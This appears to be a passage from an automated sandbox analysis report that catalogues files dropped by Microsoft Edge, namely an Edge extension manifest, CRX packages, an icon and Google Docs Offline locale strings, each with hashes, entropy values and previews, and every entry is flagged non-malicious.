Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_1247697648\ba2831a8-3ee9-48c8-80c9-0b333c714255.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\1f1ad62f-ff7e-49d7-8e04-39db617b0ac4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135751
Entropy (8bit):	7.804610863392373
Encrypted:	false
SSDEEP:	1536:h+OX7O5AeBWdSq2Zso2iDNjF3dNUPOTy61NVo8OJXhQXXUWFMOiiBIHWI7YyjM/8:pVdSj9hjVn6Oj5fOJR+k0iiW2IPMaIul
MD5:	83EF25FBEE6866A64F09323BFE1536E0
SHA1:	24E8BD033CD15E3CF4F4FF4C8123E1868544AC65
SHA-256:	F421D74829F2923FD9E5A06153E4E42DB011824C33475E564B17091598996E6F
SHA-512:	C699D1C9649977731EEA0CB4740C4BEAACEEC82AECC43F9F2B1E5625C487C0BC45FA08A1152A35EFBDB3DB73B8AF3625206315D1F9645A24E1969316F9F5B38C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........1...c@e.J.~..A...(9=...I.N.e..T......6.7...Kk?....]<.S(.....9}........$..6...:...9..b\|B..8..I..7.8K\.KIn7.:.!^;.H........8.....,.\....b..uC...e?..E.U.........P..G..u!+......C.)Kw...............4..Qye..=$..Q.......?Oi.,O.RW6.k.+.&. .wu..tf....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. ..r.....p..~..3.1.vD.i.]...~...!...<..4KV.~y.).`........>E.NT.%1".%............o.....J._.H.B..w..C......UU.&C..fB&..\|..i..J......I.??^.Z.....Y....0^......?...o.....O.~......W.....~.......R..z.Ma...u]....-.n....2s<....E..6.<..W.H.qh....:j.y...N.D.]Nj....../..a...{....g.....f).~._....1q..L..#.G...Q.w...J."

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
